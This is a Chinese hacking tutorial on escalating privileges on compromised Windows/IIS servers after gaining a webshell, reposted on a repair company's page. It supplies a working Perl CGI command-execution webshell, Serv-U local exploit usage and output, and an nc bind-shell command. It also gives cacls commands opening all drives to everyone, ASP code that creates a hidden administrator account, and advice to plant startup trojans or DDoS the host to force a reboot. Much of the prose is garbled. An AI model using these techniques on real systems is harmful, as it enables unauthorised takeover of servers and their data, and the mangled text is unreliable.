设为主页 | 加入收藏 | 繁體中文

提升权限终极技巧

  作者:WekweN  http://www.wrsky.com
  本篇文章结合了很多高手提升权限的本领和自己的一些想法
  当我们取得一个webshell时候,下一部要做的就是提升权限
  小我私家总结如下:
  1:   C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
  看可否跳转到这个目录,如果行那就最好了,间接下它的CIF文件,失掉pcAnywhere密码,登岸
  2.C:\WINNT\system32\config\
  进这里下它的SAM,破解用户的密码
  用到破解sam密码的软件有LC,SAMinside
  3.C:\Documents and Settings\All Users\「开始」菜单\程序\
  看这里能跳转不,我们从这里可以获取很多多少有效的信息
  可以看见很多多少快捷方法,我们一般选择Serv-U的,然后本地查看属性,知门途径后,看可否跳转
  出来后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
  [USER=WekweN|1]
  Password=
  HomeDir=c:\
  TimeOut=600
  Maintenance=System
  Access1=C:\|RWAMELCDP
  Access1=d:\|RWAMELCDP
  Access1=f:\|RWAMELCDP
  SKEYValues=
  这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
  4.c:\winnt\system32\inetsrv\data\
  就是这个目录,异样是erveryone 完全控制,我们所要做的就是把提升权限的东西上传上去,然后执行
  5.看可否跳转到如下目录
  c:\php,   用phpspy
  c:\prel,偶然候纷歧定是这个目录(异样可以经过下载快捷方法看属性获知)用cgi的webshell
  #!/usr/bin/perl
  binmode(STDOUT);
  syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
  $_ = $ENV{QUERY_STRING};
  s/%20/ /ig;
  s/%2f/\//ig;
  $execthis = $_;
  syswrite(STDOUT, "

\r\n", 13);
  open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
  system($execthis);
  syswrite(STDOUT, "\r\n
\r\n", 17);
  close(STDERR);
  close(STDOUT);
  exit;
  生存为cgi执行,
  如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir 
  显示"拒绝访问",表现可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的东西)到 prel的bin目录
  http://anyhost//cmd.pl?c\perl\bin\su.exe
  返回:
  Serv-u >3.x Local Exploit by xiaolu
  USAGE: serv-u.exe "command"
  Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
  如今是 IUSR 权限,提交:
  http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
  http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
  http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
  http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
  如果返回上面的信息,就表现成功了
  Serv-u >3.x Local Exploit by xiaolu
  <220 Serv-U FTP Server v5.2 for WinSock ready...
  >USER LocalAdministrator
  <331 User name okay, need password.
  民主民主民主民主民主民主民主民主民主民主民主民主民主**
  >PASS #l@$ak#.lk;0@P
  <230 User logged in, proceed.
  民主民主民主民主民主民主民主民主民主民主民主民主民主**
  >SITE MAINTENANCE
  民主民主民主民主民主民主民主民主民主民主民主民主民主**
  [+] Creating New Domain...
  <200-DomainID=2
  <220 Domain settings saved
  民主民主民主民主民主民主民主民主民主民主民主民主民主**
  [+] Domain xl:2 Created
  [+] Creating Evil User
  <200-User=xl
  200 User settings saved
  民主民主民主民主民主民主民主民主民主民主民主民主民主**
  [+] Now Exploiting...
  >USER xl
  <331 User name okay, need password.
  民主民主民主民主民主民主民主民主民主民主民主民主民主**
  >PASS 111111
  <230 User logged in, proceed.
  民主民主民主民主民主民主民主民主民主民主民主民主民主**
  [+] Now Executing: cacls.exe c: /E /T /G everyone:F
  <220 Domain deleted
  这样全部分区为everyone完全控制
  如今我们把自己的用户提升为管理员:
  http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"
  6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
  用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
  查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
  再将asp.dll参加特权一族
  asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (差别的机子放的位置纷歧定一样)
  我们如今加出来cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
  可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加出来了
  7.还可以用这段代码试提升,好象效果不显着
  <%@codepage=936%><%Response.Expires=0
  on error resume next
  Session.TimeOut=50
  Server.ScriptTimeout=3000
  set lp=Server.CreateObject("WSCRIPT.NETWORK")
  oz="WinNT://"&lp.ComputerName
  Set ob=GetObject(oz)
  Set oe=GetObject(oz&"/Administrators,group")
  Set od=ob.Create("user","WekweN$")
  od.SetPassword "WekweN"    <-----密码
  od.SetInfo
  Set of=GetObject(oz&"/WekweN$,user")
  oe.Add(of.ADsPath)
  Response.write "WekweN$ 超级帐号创建成功!"%>
  用这段代码检查能否提升成功
  <%@codepage=936%>
  <%Response.Expires=0
  on error resume next '查找Administrators组帐号
  Set tN=server.CreateObject("Wscript.Network")
  Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
  For Each admin in objGroup.Members
  Response.write admin.Name&"
"
  Next
  if err then
  Response.write "不行啊:Wscript.Network"
  end if
  %>
  8.C:\Program Files\Java Web Start\
  这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。
  9.最后了,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。
  比及主机重启或者你ddos逼它重启,来达到权限提升的目的。
  总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升东西,最后执行,三个字"找" "上""执"
  以上是本人的拙见,各人有什么好的要领多多分享         
  WekweN 
  04.12.12
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: